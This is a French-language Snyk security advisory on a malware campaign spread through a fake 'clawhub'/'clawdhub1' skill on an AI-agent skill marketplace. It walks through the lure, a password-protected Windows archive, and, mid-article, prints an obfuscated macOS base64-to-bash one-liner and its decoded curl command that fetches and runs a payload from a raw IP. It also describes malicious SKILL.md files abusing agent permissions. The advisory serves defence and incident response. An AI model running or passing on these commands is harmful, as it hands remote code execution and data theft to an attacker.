In this article
Dans les coulisses de la campagne malveillante « clawdhub » : des compétences d’agents IA déploient des shells inversés sur la marketplace OpenClaw
Le dimanche 2 février, l’équipe de recherche en sécurité de Snyk a découvert une campagne de malware ciblée, intégrée directement à la marketplace de compétences ClawHub (clawhub.ai), un dépôt populaire de capacités pour agents IA.
L’entrée malveillante, publiée à l’origine par l’utilisateur zaycv sous le nom clawhub, se fait passer pour un outil CLI officiel de gestion des compétences d’agents. Bien que la version initiale ait été supprimée le 3 février, les chercheurs de Snyk ont identifié une variante toujours active, nommée clawdhub1, qui a déjà été installée près de 100 fois.

Cette campagne toujours active confirme les avertissements urgents émis par Snyk plus tôt cette année au sujet des risques de sécurité liés aux assistants personnels IA et du danger particulier des fichiers « SKILL.md » utilisés comme vecteurs d’attaque. Si vous avez utilisé des compétences « ClawHub CLI » ou suivi des instructions d’installation de l’utilisateur zaycv au cours des dernières 48 heures, considérez que votre machine hôte est compromise.
Chaîne d’infection de clawdhub1
L’attaque repose sur un mécanisme de diffusion en plusieurs étapes qui contourne l’analyse statique (limitée) de ClawHub en gardant toute la logique malveillante à l’extérieur du fichier SKILL.md.
1. Ingénierie sociale : l’appât des performances
L’attaquant, zaycv, utilise un jargon technique pour cibler les utilisateurs avancés. La description de la compétence promet une « mise en cache et une compression avancées » ainsi qu’une « optimisation des performances » pour la publication de compétences. Cette approche cible précisément les développeurs susceptibles d’être frustrés par la latence des outils standard, et donc plus enclins à installer un utilitaire d’« optimisation » sans remettre en question les prérequis.

2. Vecteur Windows : contournement protégé par mot de passe
Pour les utilisateurs de Windows, le fichier SKILL.md renvoie vers une version GitHub hébergée par l’utilisateur Ddoy233 (un compte créé spécifiquement pour cette campagne).
Dépôt : https://github.com/Ddoy233/openclawcli
Technique : l’archive (
openclawcli.zip) est protégée par mot de passe (mot de passe :openclaw).Pourquoi c’est important : le chiffrement du fichier zip est une technique délibérée utilisée pour contourner les scanners de sécurité automatisés, les filtres de messagerie et les contrôles de sécurité des navigateurs qui tentent d’inspecter le contenu des archives à la recherche de signatures de malware. À l’intérieur, le « CLI » contient un exécutable piégé et des DLL probablement conçus pour voler des informations.

3. Vecteur macOS : exécution obfusquée via Glot.io
Les instructions pour macOS dirigent les utilisateurs vers un extrait de code sur glot.io, un service de partage de code de type pastebin. Cela ajoute une couche d’indirection : le code malveillant ne se trouve pas dans le fichier SKILL.md et n’est pas non plus directement téléchargé sous forme de fichier.
La couche d’obfuscation : l’extrait semble afficher un message anodin « Installer-Package », mais transmet une chaîne base64 à bash :
L’URL
download.setup-service.comest une chaîne leurre destinée à ressembler à une source de paquets légitime dans la sortie du terminal et à rassurer l’utilisateur.La chaîne base64 -D | bash est le véritable déclencheur de l’exécution.
1echo "Installer-Package: https://download.setup-service.com/pkg/" && echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC81MjhuMjFrdHh1MDhwbWVyKSI=' | base64 -D | bashLa charge utile : une fois décodée, la commande récupère directement un script shell depuis une adresse IP brute :
1/bin/bash -c "$(curl -fsSL http://91.92.242.30/528n21ktxu08pmer)"Cette commande exécute une charge utile de deuxième étape depuis 91.92.242.30, une adresse IP non réputée qui contourne les listes de blocage de domaines.
Chronologie de la découverte
2 février 2026 : Luca Beurer-Kellner, ingénieur de recherche principal chez Snyk, repère la compétence malveillante d’origine
clawhub(7 743 téléchargements) sur la marketplace.3 février 2026 : la compétence
clawhubest supprimée de la marketplace.3 février 2026 (plus tard) : Aleksei Kudrinskii, ingénieur en incubation chez Snyk, découvre que l’attaquant est de retour avec une variante renommée,
clawdhub1, qui reste active et opérationnelle.4 février 2026 : Snyk publie cet avis de sécurité.
Le point de vue de Snyk : sécuriser la chaîne d’approvisionnement IA
Cet incident met en évidence un angle mort critique de la « pile IA » moderne. Nous passons d’un monde de dépendances logicielles à un monde de dépendances aux capacités des agents.
Les outils AppSec traditionnels analysent votre code et vos conteneurs. Ils ne lisent pas les instructions en anglais d’un fichier SKILL.md et ne vérifient pas non plus l’intention derrière l’« utilisation d’outils » par un agent IA.
Le risque « épicé » des workflows agentiques : comme nous l’avons expliqué dans notre analyse de Clawdbot, les agents IA comme OpenClaw disposent souvent de permissions étendues — lecture des e-mails, accès aux systèmes de fichiers et exécution de commandes shell — pour jouer efficacement leur rôle d’assistant. Lorsqu’une compétence malveillante comme clawdhub1 est installée, elle hérite de ces permissions. Le malware ne compromet pas seulement la machine ; il peut potentiellement compromettre tous les services auxquels l’agent IA est autorisé à accéder, des dépôts GitHub à l’infrastructure cloud.
C’est là qu’intervient Snyk Evo. La plateforme Evo de Snyk et AI-SPM (AI Security Posture Management) sont conçus pour régir précisément ce type d’interactions non contrôlées :
Modèles et outils d’IA non gérés : Evo détecte lorsque des développeurs ou des agents introduisent dans l’environnement de l’entreprise des outils externes non vérifiés (comme une compétence quelconque provenant d’une marketplace).
Visibilité sur la chaîne d’approvisionnement : tout comme Snyk Advisor évalue les paquets npm, la recherche en sécurité IA de Snyk s’attache désormais à évaluer la réputation des compétences d’agents et des poids de modèles, en signalant les anomalies comme un « nouvel utilisateur » (
zaycv) qui publie un « outil système critique » sans aucun historique au sein de la communauté.
Comment se protéger des malwares SKILLS et MCP
Snyk propose plusieurs moyens de se protéger contre les menaces natives de l’IA :
Des outils comme mcp-scan (Model Context Protocol Scanner) représentent la prochaine évolution de la défense : ils veillent à ce que les instructions transmises aux agents ne compromettent pas le système. MCP Scan détecte les serveurs MCP volontairement malveillants par injection de prompt ou empoisonnement d’outils, et détecte également les fichiers SKILL.md malveillants et à risque.
Des outils comme l’AI-BOM de Snyk (une autre commande facile à exécuter :
snykaibom) vous aideront à inventorier les composants d’IA utilisés dans l’ensemble de votre base de code, notamment les modèles d’IA, les agents, les serveurs MCP, les jeux de données et les plug-ins.
Mesures correctives et indicateurs de compromission (IOC)
Mesures immédiates :
Bloquer le trafic : bloquez immédiatement le trafic sortant vers
91.92.242.30au niveau du pare-feu.Vérifier les compétences : contrôlez votre compte ClawHub et les configurations locales de vos agents pour repérer toute compétence nommée
clawhubouclawdhub1, installée par l’utilisateurzaycv.Exécuter les vérifications Snyk : assurez-vous que vos environnements de développement IA sont analysés.
Indicateurs de compromission (IOC) :
Domaines/IP : 91.92.242.30
URL : https://glot.io/snippets/hfd3x9ueu5, https://github.com/Ddoy233/openclawcli
Noms d’utilisateur : zaycv (ClawHub), Ddoy233 (GitHub)
Noms de paquets : clawhub, clawdhub1
Références :
GUIDE
Unifier le contrôle de l’IA agentique avec Evo by Snyk
Evo by Snyk offre aux responsables de la sécurité et de l’ingénierie une orchestration unifiée en langage naturel pour la sécurité de l’IA. Découvrez comment Evo coordonne des agents spécialisés pour assurer une protection de bout en bout tout au long du cycle de vie de votre IA.